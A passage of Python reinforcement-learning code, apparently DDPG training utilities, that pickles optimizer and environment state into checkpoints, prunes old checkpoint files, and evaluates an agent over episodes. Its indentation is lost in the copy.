adam_optimizer_store['actor_optimizer']['m'] = agent.actor_optimizer.m
adam_optimizer_store['actor_optimizer']['v'] = agent.actor_optimizer.v
adam_optimizer_store['actor_optimizer']['t'] = agent.actor_optimizer.t
adam_optimizer_store['critic_optimizer']['m'] = agent.critic_optimizer.m
adam_optimizer_store['critic_optimizer']['v'] = agent.critic_optimizer.v
adam_optimizer_store['critic_optimizer']['t'] = agent.critic_optimizer.t
adam_optimizer_store['param_noise'] = agent.param_noise
pickle.dump(adam_optimizer_store, open((saved_model_path +
"-" + str(epoch) +
".pkl"), "wb"))
old_epoch = epoch - max_to_keep
if old_epoch >= 0:
try:
os.remove(saved_model_path + "-" + str(old_epoch)
+ ".pkl")
except OSError:
pass
if rank == 0 and logdir:
if hasattr(env, 'get_state'):
with open(os.path.join(logdir, 'env_state.pkl'), 'wb') as f:
pickle.dump(env.get_state(), f)
if eval_env and hasattr(eval_env, 'get_state'):
with open(os.path.join(logdir, 'eval_env_state.pkl'), 'wb') as f:
pickle.dump(eval_env.get_state(), f)
def evaluate_n_episodes(n, eval_env, agent, nb_eval_steps, render):
results = []
for i in range(n):
results.append(evaluate_one_episode(eval_env, agent, nb_eval_steps, render))
rewards = [r[0] for r in results]
q_means = [r[1] for r in results]
steps = [r[2] for r in results]
return np.mean(rewards), np.average(q_means, weights=steps), np.mean(steps)
def evaluate_one_episode(env, agent, nb_eval_steps, render):
if nb_eval_steps <= 0:
logger.error('evaluate_one_episode nb_eval_steps must be > 0')
reward = 0.
qs = []
obs = env.reset()
for step in range(nb_eval_steps):
action, q = agent.pi(obs, apply_noise=False, compute_Q=True)
obs, r, done, info = env.step(action)
if render:
env.render()
reward += r
qs.append(q)
if done:
#obs = env.reset()
break # the original baseline code didn't have this break statement, so would average multiple evaluation episodes
elif step >= nb_eval_steps:
logger.warn('evaluate_one_episode step', step, 'exceeded nb_eval_steps', nb_eval_steps, 'but done is False')
#obs = env.reset()
break
return reward, np.mean(qs), step+1
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.